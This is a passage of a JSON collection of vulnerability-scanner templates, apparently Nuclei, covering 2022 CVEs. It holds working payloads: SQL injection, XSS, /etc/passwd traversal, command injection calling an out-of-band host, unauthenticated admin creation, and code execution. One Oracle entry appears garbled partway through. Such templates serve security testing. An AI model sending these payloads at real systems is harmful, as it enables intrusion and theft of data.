Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/readme.txt"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '<= 3.5.5')"]},{"type":"word","part":"body","words":["Elementor Website Builder"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"],"internal":true},{"type":"regex","group":1,"regex":["(?m)Stable tag: ([0-9.]+)"]}]}]},{"id":"CVE-2022-30512","info":{"name":"School Dormitory Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Fatal error","Uncaught Error: Call to a member function fetch_assoc()","Month of"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/simple-membership/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Simple Membership","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34121","info":{"name":"CuppaCMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /templates/default/html/windows/right.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurl=../../../../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2383","info":{"name":"WordPress Feed Them Social <3.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/feed-them-social/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["Feed Them Social","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=fts_refresh_token_ajax&feed=instagram&expires_in=%3Cimg%20src%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["
    "]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1933","info":{"name":"WordPress CDI <5.1.9 - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=cdi_collect_follow&trk=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Tracking code not correct"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43017","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\">&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0949","info":{"name":"WordPress Stop Bad Bots <6.930 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=0\n","@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nX-Real-IP: {{IP}}\nContent-Type: application/x-www-form-urlencoded\n\naction=stopbadbots_grava_fingerprint&fingerprint=(SELECT SLEEP(6))\n","GET /wp-content/plugins/stopbadbots/assets/js/stopbadbots.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(body_3, \"commentform\")"],"condition":"and"}]}]},{"id":"CVE-2022-0867","info":{"name":"WordPress ARPrice <3.6.1 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=arplite_insert_plan_id&arp_plan_id=x&arp_template_id=1+AND+(SELECT+8948+FROM+(SELECT(SLEEP(6)))iIic)\n","GET /wp-content/plugins/arprice-responsive-pricing-table/js/arprice.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code_1 == 200","contains(content_type_1, \"text/html\")","contains(body_2, \"ArpPriceTable\")"],"condition":"and"}]}]},{"id":"CVE-2022-0147","info":{"name":"WordPress Cookie Information/Free GDPR Consent Solution <2.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=wp-gdpr-compliance&x=%27+onanimationstart%3Dalert%28document.domain%29+style%3Danimation-name%3Arotation+x HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["x=\\' onanimationstart=alert(document.domain) style=animation-name:rotation x'","toplevel_page_wp-gdpr-compliance"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-44291","info":{"name":"WebTareas 2.4p5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /general/login.php?session=false HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525\n\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"action\"\n\nlogin\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginForm\"\n\n{{username}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"passwordForm\"\n\n{{password}}\n-----------------------------3023071625140724693672385525\nContent-Disposition: form-data; name=\"loginSubmit\"\n\nLog In\n-----------------------------3023071625140724693672385525--\n","@timeout: 20s\nGET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=6","len(body_2) == 0","status_code_2 == 302","contains(header_2, \"text/html\")","contains(body_1, \"webTareasSID\")"],"condition":"and"}]}]},{"id":"CVE-2022-22536","info":{"name":"SAP Memory Pipes (MPI) Desynchronization","severity":"critical"},"requests":[{"raw":["GET {{sap_path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 82646\nConnection: keep-alive\n\n{{repeat(\"A\", 82642)}}\n\nGET / HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"sap_path":["/sap/admin/public/default.html","/sap/public/bc/ur/Login/assets/corbu/sap_logo.png"]},"stop-at-first-match":true,"unsafe":true,"read-all":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(tolower(body), 'administration')","contains(tolower(header), 'content-type: image/png')"],"condition":"or"},{"type":"word","part":"body","words":["HTTP/1.0 400 Bad Request","HTTP/1.0 500 Internal Server Error","HTTP/1.0 500 Dispatching Error"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2314","info":{"name":"WordPress VR Calendar <=2.3.2 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /wp-content/plugins/vr-calendar-sync/assets/js/public.js HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-admin/admin-post.php?vrc_cmd=phpinfo HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["phpinfo","PHP Version"],"condition":"and"},{"type":"word","part":"body_1","words":["vrc-calendar"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-39960","info":{"name":"Jira Netic Group Export <1.0.3 - Missing Authorization","severity":"medium"},"requests":[{"raw":["POST /plugins/servlet/groupexportforjira/admin/json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngroupexport_searchstring=&groupexport_download=true\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"jiraGroupObjects\"","\"groupName\""],"condition":"and"},{"type":"word","part":"header","words":["attachment","jira-group-export"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31814","info":{"name":"pfSense pfBlockerNG <=2.1..4_26 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /pfblockerng/www/index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n\n","GET /pfblockerng/www/index.php HTTP/1.1\nHost: ' *; host {{interactsh-url}}; '\nAccept: */*\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"GIF\")"]},{"type":"word","part":"interactsh_protocol","words":["dns"]}]}]},{"id":"CVE-2022-28117","info":{"name":"Navigate CMS 2.9.4 - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /navigate/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------123456789012345678901234567890\n\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-username\"\n\n{{username}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"csrf_token\"\n\n{{csrf_token}}\n-----------------------------123456789012345678901234567890\nContent-Disposition: form-data; name=\"login-password\"\n\n{{password}}\n-----------------------------123456789012345678901234567890\n","POST /navigate/navigate.php?fid=dashboard&act=json&oper=feed HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nlimit=5&language=en&url=file:///etc/passwd\n","GET /navigate/private/1/cache/0f1726ba83325848d47e216b29d5ab99.feed HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["csrf_token\" value=\"([a-f0-9]{64})"],"internal":true,"part":"body"}]}]},{"id":"CVE-2022-23898","info":{"name":"MCMS 5.2.5 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /cms/content/list HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncategoryId=1' and updatexml(1,concat(0x7e,md5({{num}}),0x7e),1) and 'zzz'='zzz\n"],"matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25"]}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25369","info":{"name":"Dynamicweb 9.5.0 - 9.12.7 Unauthenticated Admin User Creation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Admin/Access/Setup/Default.aspx?Action=createadministrator&adminusername={{rand_base(6)}}&adminpassword={{rand_base(6)}}&adminemail=test@test.com&adminname=test"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"Success\": true","\"Success\":true"],"condition":"or"},{"type":"word","part":"header","words":["application/json","ASP.NET_SessionId"],"condition":"and","case-insensitive":true},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0228","info":{"name":"Popup Builder < 4.0.7 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 15s\nGET /wp-admin/admin-post.php?action=csv_file&orderby=email%2c(select+*+from(select(sleep(7)))b)&order=desc HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration_2>=7","status_code_2 == 200","contains_all(body_2, \"first name\", \"last name\", \"email\")","contains(content_type_2, \"application/octet-stream\")"],"condition":"and"}]}]},{"id":"CVE-2022-2487","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /cgi-bin/nightled.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=night_led&start_hour=;{{cmd}};\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","nightStart"],"condition":"and"},{"type":"word","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-21587","info":{"name":"Oracle E-Business Suite 12.2.3 -12.2.11 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````\"]P-%;HR5LG>@```'H```!#````+BXO+BXO+BXO+BXO+BXO\nM1DU77TAO;64O3W)A8VQE7T5\"4RUA<'`Q+V-O;6UO;B]S8W)I<'1S+W1X:T9.\nM1%=24BYP;'5S92!#1TD[\"G!R:6YT($-'23HZ:&5A9&5R*\"`M='EP92`]/B`G\nM=&5X=\"]P;&%I;B<@*3L*;7D@)&-M9\"`](\")E8VAO($YU8VQE:2U#5D4M,C`R\nM,BTR,34X-R([\"G!R:6YT('-Y@```$,``````````````+2!`````\"XN+RXN\nM+RXN+RXN+RXN+T9-5U](;VUE+T]R86-L95]%0E,M87!P,2]C;VUM;VXO&M&3D174E(N<&Q02P4&``````$``0!Q````VP``````\n`\nend\n------WebKitFormBoundaryZsMro0UsAQYLDZGv--\n","GET /OA_CGI/FNDWRR.exe HTTP/1.1\nHost: {{Hostname}}\n","POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv\n\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"bne:uueupload\"\n\nTRUE\n------WebKitFormBoundaryZsMro0UsAQYLDZGv\nContent-Disposition: form-data; name=\"uploadfilename\";filename=\"testzuue.zip\"\n\nbegin 664 test.zip\nM4$L#!!0``````&UP-%:3!Malert(document.domain);\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Serach Result Against \""]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0594","info":{"name":"WordPress Shareaholic <9.7.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=shareaholic_debug_info"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["plugin_version","shareaholic_server_reachable"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0201","info":{"name":"WordPress Permalink Manager <2.2.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","pm_query"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}]}]},{"id":"CVE-2022-46073","info":{"name":"Helmet Store Showroom - Cross Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/hss/?q=%27%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Helmet Store Showroom\")","contains(body, \">\")"],"condition":"and"}]}]},{"id":"CVE-2022-0342","info":{"name":"Zyxel - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["interface-name","saved at"],"condition":"and"},{"type":"word","part":"header","words":["text/zyxel","attachment; filename="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-42233","info":{"name":"Tenda 11N - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /index.asp HTTP/1.1\nHost: {{Hostname}}\nCookie: admin\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword","Tenda 11N"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["GoAhead-Webs"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0288","info":{"name":"WordPress Ad Inserter <2.7.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}"],"body":"html_element_selection=\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","ad-inserter"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0378","info":{"name":"Microweber Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(document.domain)+xx=%22test&from_url=x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["mwui_init","onmousemove=\"alert(document.domain)"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34094","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-3484","info":{"name":"WordPress WPB Show Core - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?audioPlayerOption=1&fileList[0][title]=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains(body, \"wpb_jplayer_setting\")","contains(body, \"\")"],"condition":"and"}]}]},{"id":"CVE-2022-36883","info":{"name":"Jenkins Git <=4.11.3 - Missing Authorization","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/git/notifyCommit?url={{randstr}}&branches={{randstr}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["repository:","SCM API plugin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25489","info":{"name":"Atom CMS v2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/widgets/debug.php?a="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","Path Array","console-debug"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25356","info":{"name":"Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Exception: Error while [Loading XML","<RegKey>","<IsAdmin>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2376","info":{"name":"WordPress Directorist <7.3.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=directorist_author_pagination"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["directorist-authors__card__details__top","directorist-authors__card__info-list"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-22947","info":{"name":"Spring Cloud Gateway Code Injection","severity":"critical"},"requests":[{"raw":["POST /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n \"predicates\": [\n {\n \"name\": \"Path\",\n \"args\": {\n \"_genkey_0\": \"/{{randstr}}/**\"\n }\n }\n ],\n \"filters\": [\n {\n \"name\": \"RewritePath\",\n \"args\": {\n \"_genkey_0\": \"#{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")}\",\n \"_genkey_1\": \"/${path}\"\n }\n }\n ],\n \"uri\": \"{{RootURL}}\",\n \"order\": 0\n}\n","POST /actuator/gateway/refresh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n \"predicate\": \"Paths: [/{{randstr}}], match trailing slash: true\",\n \"route_id\": \"{{randstr}}\",\n \"filters\": [\n \"[[RewritePath #{T(java.net.InetAddress).getByName(\\\"{{interactsh-url}}\\\")} = /${path}], order = 1]\"\n ],\n \"uri\": \"{{RootURL}}\",\n \"order\": 0\n}\n","DELETE /actuator/gateway/routes/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["/routes/{{randstr}}"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[201]}]}]},{"id":"CVE-2022-25486","info":{"name":"Cuppa CMS v1.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["POST /alerts/alertConfigField.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nurlConfig=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34267","info":{"name":"RWS WorldServer - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /ws-api/v2/users/me/details?token=02 HTTP/2\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"fullName\":\"System\""]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31974","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5('{{num}}'),5,6,7,8,9,10--+"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-23348","info":{"name":"BigAnt Server 5.6.06 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Runtime/Data/ms_admin.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_name\";","\"user_pwd\";","\"user_id\";"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-2373","info":{"name":"WordPress Simply Schedule Appointments <1.5.7.7 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/ssa/v1/users"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","regex":["response_code\":200","\"email\":\"([a-zA-Z-_0-9@.]+)\",\"display_name\":\"([a-zA-Z-_0-9@.]+)\",\"gravatar_url\":\"http?:\\\\\\/\\\\\\/([a-z0-9A-Z.\\\\\\/?=&@_-]+)\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34093","info":{"name":"Software Publico Brasileiro i3geo v7.0.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(content_type, \"text/html\")","contains_all(body, \"%3Cscript%3Ealert(document.domain)%3C/script%3E\", \"Invalid consumer key\")"],"condition":"and"}]}]},{"id":"CVE-2022-43014","info":{"name":"OpenCATS 0.9.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /index.php?m=login&a=attemptLogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","CATS="],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-35493","info":{"name":"eShop 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/home/get_products?search=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["Search Result for \\\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-40359","info":{"name":"Kae's File Manager <=1.4.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /kfm/index.php/' HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["","x_kfm_changeCaption","kfm_copyFiles"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-37190","info":{"name":"Cuppa CMS v1.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nuser={{username}}&password={{password}}&language=en&task=login\n","POST /components/table_manager/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\npath=component%2Ftable_manager%2Fview%2Fcu_api_keys\n","POST /api/index.php HTTP/1.1\nHost: {{Hostname}}\nkey: {{apikey}}\nContent-Type: application/x-www-form-urlencoded\n\naction=system&function=exec&cmd=cat+/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header_3","words":["text/html"]},{"type":"regex","regex":["postgres:.*:1001:","root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"apikey","group":1,"regex":["(.*?)"],"internal":true}]}]},{"id":"CVE-2022-45917","info":{"name":"ILIAS eLearning <7.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/shib_logout.php?action=logout&return=https://oast.me","{{BaseURL}}/ilias/shib_logout.php?action=logout&return=https://oast.me"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2022-38637","info":{"name":"Hospital Management System 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /hms/user-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["User | Dashboard","Book My Appointment"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0149","info":{"name":"WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET 